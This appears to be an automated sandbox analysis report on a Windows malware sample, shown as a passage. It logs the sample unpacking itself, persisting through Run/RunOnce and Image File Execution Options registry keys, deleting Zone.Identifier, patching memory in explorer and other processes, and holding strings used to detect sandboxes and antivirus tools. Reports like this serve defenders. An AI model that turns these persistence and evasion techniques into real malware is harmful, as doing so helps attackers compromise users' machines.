Source: unknown	Process created: C:\ProgramData\Java Update Controller\935aa375omok5c.exe 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
Source: unknown	Process created: C:\ProgramData\Java Update Controller\935aa375omok5c.exe 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Unpacked PE file: 0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 22.2.935aa375omok5c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 24.2.935aa375omok5c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 26.2.935aa375omok5c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 28.2.935aa375omok5c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Unpacked PE file: 0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 22.2.935aa375omok5c.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 24.2.935aa375omok5c.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 26.2.935aa375omok5c.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 28.2.935aa375omok5c.exe.400000.0.unpack

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0046BC0D push ecx; ret	0_2_0046BC20
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004378C3 push ebp; iretd	0_2_004378C4
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043B4CA push esp; retf	0_2_0043B4DF
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004378D4 push edi; iretd	0_2_004378DF
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004364E6 push ECD15862h; retf	0_2_00436534
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00439498 push ebp; retf	0_2_00439499
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00435959 push ebp; retf	0_2_00435962
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00435118 push ebp; retf	0_2_00435119
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00436126 push esp; retf 0000h	0_2_00436127
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00436D29 push edx; iretd	0_2_00436D37
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043512D push edi; iretd	0_2_00435133
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004365D7 push edi; retf	0_2_004365DB
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004395DF push ebp; retf	0_2_004395F1
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004365E5 push esp; iretd	0_2_004365E6
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00436193 push DD000000h; iretd	0_2_0043619D
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00438194 push ebp; iretd	0_2_00438195
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00435243 push edi; retf	0_2_00435249
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00435268 push edx; retf	0_2_00435269
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043BE1F push edi; iretd	0_2_0043BE38
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043A23A push edi; iretd	0_2_0043A24D
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043C6DB push edi; iretd	0_2_0043C6DC
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043928C push ebp; retf 0000h	0_2_0043929E
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043C2AB push FC000000h; retf	0_2_0043C2B8
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043574B push edx; retf	0_2_0043575D
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00439B51 push edi; retf	0_2_00439B76
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00439F54 push edx; iretd	0_2_00439F7C
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043635B push edi; iretd	0_2_0043635C
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043575F push edx; retf	0_2_0043575D
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0043C75E push edx; iretd	0_2_0043C75F
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00435B0A push F8ECD6DDh; retf	0_2_00435B1B
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00435B1D push F8ECD6DDh; retf	0_2_00435B1B

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

PE file moved: C:\ProgramData\Java Update Controller\935aa375omok5c.exe

Jump to behavior

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\935aa375omok5c.exe DisableExceptionChainValidation

Jump to behavior

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\935aa375omok5c.exe DisableExceptionChainValidation			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe Debugger			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Java Update Controller	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Java Update Controller	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Java Update Controller	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Java Update Controller	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Java Update Controller	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Java Update Controller	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	File opened: C:\ProgramData\Java Update Controller\935aa375omok5c.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\ProgramData\Java Update Controller\935aa375omok5c.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	File opened: C:\ProgramData\Java Update Controller\935aa375omok5c.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Overwrites Windows DLL code with PUSH RET codes

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 3888 base: 77E377F0 value: 68 EF 33 66 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 4840 base: 77E377F0 value: 68 EF 33 88 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 2524 base: 77E377F0 value: 68 EF 33 F0 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 3544 base: 77E377F0 value: 68 EF 33 D5 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 5084 base: 77E377F0 value: 68 EF 33 AF 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 4660 base: 77E377F0 value: 68 EF 33 AD 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 2392 base: 77E377F0 value: 68 EF 33 77 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 1008 base: 77E377F0 value: 68 EF 33 1A 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 3484 base: 77E377F0 value: 68 EF 33 68 01 C3	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 3948 base: 77E377F0 value: 68 EF 33 72 01 C3	Jump to behavior

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: gGRiqYglIOLbY.exe, 935aa375omok5c.exe, gGRiqYglIOLbY.exe, 00000019.00000000.478865388.0000000001A00000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001A.00000002.481247538.00000000023A0000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001C.00000002.695383351.00000000022B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.490508386.00000000019E0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.504465423.0000000001680000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.513443887.00000000010B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000002.731423528.0000000001590000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: DIR_WATCH.DLL
Source: gGRiqYglIOLbY.exe, 935aa375omok5c.exe, gGRiqYglIOLbY.exe, 00000019.00000000.478865388.0000000001A00000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001A.00000002.481247538.00000000023A0000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001C.00000002.695383351.00000000022B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.490508386.00000000019E0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.504465423.0000000001680000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.513443887.00000000010B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000002.731423528.0000000001590000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: SBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLL%02XEVERYONECURRENT_USER0X%08XSB:0X%08XG:%S_0X%08X_%C:%S_V1$G:%S_0X%08XOPENMSCOREE.DLLSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\%U2500ISOLATIONPMILNOPROTECTEDMODEBANNERYESCHECK_ASSOCIATIONSSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINIEXPLORE.EXESOFTWARE\CLIENTS\STARTMENUINTERNETIE.HTTPPROGIDSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTP\USERCHOICEIE.HTTPSSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTPS\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTM\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTML\USERCHOICEIE.ASSOCFILE.HTMCHROME.EXEFIREFOX.EXEOPERA.EXESAFARI.EXE360BROWSER.EXEMAXTHON.EXESVCVERSIONSOFTWARE\MICROSOFT\INTERNET EXPLORERVERSIONCURRENTVERSIONSOFTWARE\MOZILLA\MOZILLA FIREFOXHTTP\SHELL\OPEN\COMMANDSTART PAGEAPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMANDIEX(X86)%S\INTERNET EXPLORER\IEXPLORE.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\%SFLAGSCOOKIE:MOZILLA\FIREFOX\PROFILESCOOKIES.SQLITEERP~DCEN7ZXY~CXE7:7DND~YCREYV{D-7```9DND~YCREYV{D9TXZX[[NSUPDXQC`VERK^ZZBY~CN7^YTPZREZXY~CXE~YP7:7VG^7ZXY~CXE7A%7$%:U~CGEXTZXYH@^YSX@HT[VDDC^SV@~YSX`DNDCRZKTXYCEX{DRC''&KDREA~TRDKS~D\|KRYBZAZ`VERAUXODNDCRZKTBEERYCTXYCEX{DRCKDREA~TRDKAZ`VERDXQC@VERKAZ`VER;7^YT90LIBRARYINDOTASKMGR.EXEPROCEXP.EXE\DESKTOPDOCUMENTS%S\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6.0._*%S\WINSXS\%S\COMCTL32.DLLK32GETMAPPEDFILENAMEWPSAPI.DLLGETMAPPEDFILENAMEWSYSTEMMANUFACTURERHARDWARE\DESCRIPTION\SYSTEM\BIOSVMWARSYSTEMBIOSVERSIONHARDWARE\DESCRIPTION\SYSTEMVBOXDRIVERSVBOXVIDEO.SYSVBOXGUEST.SYSVMHGFS.SYSPRL_BOOT.SYSJJ8J^QPEJJ8J@TYNQCSEBCMD.EXEPROCESSORNAMESTRINGHARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0DG_SSUDBUSAPPLE MOBILE DEVICESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION%S\%SDEPLOYMENT.SECURITY.LEVEL=MEDIUM
Source: gGRiqYglIOLbY.exe, 935aa375omok5c.exe, gGRiqYglIOLbY.exe, 00000019.00000000.478865388.0000000001A00000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001A.00000002.481247538.00000000023A0000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001C.00000002.695383351.00000000022B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.490508386.00000000019E0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.504465423.0000000001680000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.513443887.00000000010B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000002.731423528.0000000001590000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: gGRiqYglIOLbY.exe, 935aa375omok5c.exe, gGRiqYglIOLbY.exe, 00000019.00000000.478865388.0000000001A00000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001A.00000002.481247538.00000000023A0000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001C.00000002.695383351.00000000022B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.490508386.00000000019E0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.504465423.0000000001680000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.513443887.00000000010B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000002.731423528.0000000001590000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: API_LOG.DLL
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310516074.0000000002380000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000000.307839801.0000000002C00000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 0000000E.00000002.730793060.0000000001180000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000010.00000002.731030721.0000000001570000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000014.00000000.334771420.0000000001790000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000015.00000002.731567574.0000000001E10000.00000040.00000001.sdmp, 935aa375omok5c.exe, 00000016.00000002.365278502.00000000024C0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000017.00000002.731117696.0000000001C60000.00000040.00000001.sdmp, 935aa375omok5c.exe, 00000018.00000002.481759587.0000000002340000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000019.00000000.478865388.0000000001A00000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001A.00000002.481247538.00000000023A0000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001C.00000002.695383351.00000000022B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.490508386.00000000019E0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.504465423.0000000001680000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.513443887.00000000010B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000002.731423528.0000000001590000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: ELEVATION:ADMINISTRATOR!NEW:\DEVICE\HARDDISK0\PARTITION\??\PHYSICALDRIVE0WINE_GET_VERSIONWINE_GET_UNIX_FILE_NAMEPRODUCTID76487-640-1457236-2383776487-337-8429955-2261476487-644-3177037-2351076497-640-6308873-2383555274-640-2673064-2395076487-640-8834005-2319576487-640-0716662-2353576487-644-8648466-2310600426-293-8170032-8514676487-341-5883812-2242076487-OEM-0027453-63796SANDBOXSAND BOXMALWAREMALTESTTEST USERTRANSPARENTENABLEDPOLICYSCOPEDEFAULTLEVELITEMDATADESCRIPTIONSYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\%SSTANDARDPROFILEENABLEFIREWALLPUBLICPROFILESTANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST%S::ENABLEDWUAUSERVWSCSVCBITSMPSSVCSHAREDACCESSAVCUF32.DLL.KASPERSKY.COM.DRWEB.COMSYMANTEC.COM.AVAST.COM.AVG.COM.PANDASECURITY.COM.NAI.COMTRENDMICRO.COM.AVIRA.COM.COMODO.COM.SOPHOS.COMKAVDUMPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORERHIDESCAHEALTHTASKBARNONOTIFICATIONRSTRUI.EXESOFTWARE\MICROSOFT\INTERNET EXPLORER\SETUP\%SDONOTALLOWIE1112.0DONOTALLOWIE12WINDEFENDMRTSTUB.EXEMRT.EXERAPPORTMGMTSERVICETRSEE\RAPORT\RAPPORTSETUP.EXEWINDOWS DEFENDER%PROGRAMW6432%%PROGRAMFILES%WINDOWS DEFENDER\MSASCUI.EXEMPCMDRUN.EXEMSMPENG.EXEMPSVC.DLLNISSRV.EXEMSSECES.EXEMSASCUI.EXEMSCMSMPSVCAVG_UIAVGWDAVGUI.EXEAVGIDSAGENT.EXEAVGWDSVC.EXEAVGDIAGEX.EXEAVGMFAPX.EXEAVGUPD.EXEAVGCFGEX.EXEAVGCSRVA.EXEAVIRAAVGNTANTIVIRSERVICEUPDATE.DLLUPDATERC.DLLUPDATE.EXEUPDRGUI.EXEAVWEBLOADER.EXEAVGNT.EXEAVGUARD.EXEAVSHADOW.EXEAVCENTER.EXEUSRREQ.EXEAVPAVP15.0.0AVP15.0.1KASPERY\AVP.EXEAVPUI.EXECCSVCHST.EXESAV INSTALL DIRECTORYSOFTWARE\SYMANTEC\SYMANTEC ENDPOINT PROTECTION\INSTALLEDAPPSNAVNISN360NAVW32.EXENORTON 